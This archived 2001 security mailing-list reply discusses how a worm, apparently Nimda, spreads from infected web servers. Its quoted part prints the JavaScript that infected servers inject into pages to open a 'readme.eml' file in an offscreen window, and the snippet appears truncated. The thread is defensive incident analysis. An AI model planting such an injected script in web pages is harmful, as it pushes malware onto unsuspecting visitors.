Re: [unisog] Some more details on the worm

From: Jeffrey Altman (
Date: 09/19/01

Date: Tue, 18 Sep 2001 20:54:51 EDT
From: Jeffrey Altman <>
To: "Davis, Matt" <>
Subject: Re: [unisog] Some more details on the worm
Message-ID: <>

.eml is listed in the Registry as "Microsoft Internet Mail Message"
with Content Type = "message/rfc822". On my Windows 2000 system this
will result in a program called


being executed using the Apartment threading model.

- Jeff

> When pages are served up by an infected server, it looks as though
> readme.eml is 'attached' to them. The server attempts to get the client to
> open them through the following bit of code (from the .dll file):
> <script language="JavaScript">"readme.eml", null,
> "resizable=no,top=6000,left=6000")</script>
> According to Slashdot, this causes the file to be automatically opened and
> executed by the client. I haven't been able to confirm or deny that (but if
> someone can, please do).
> Regards,
> Matt
> --
> Matt Davis, MCP
> Intermediate Client Server Business Support Analyst
> COUNTRY(SM) Insurance & Financial Services
> 309-821-6288

 Jeffrey Altman * Sr.Software Designer C-Kermit 8.0 Beta available
 The Kermit Project @ Columbia University includes Secure Telnet and FTP using Kerberos, SRP, and OpenSSL. SSH soon to follow.

This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: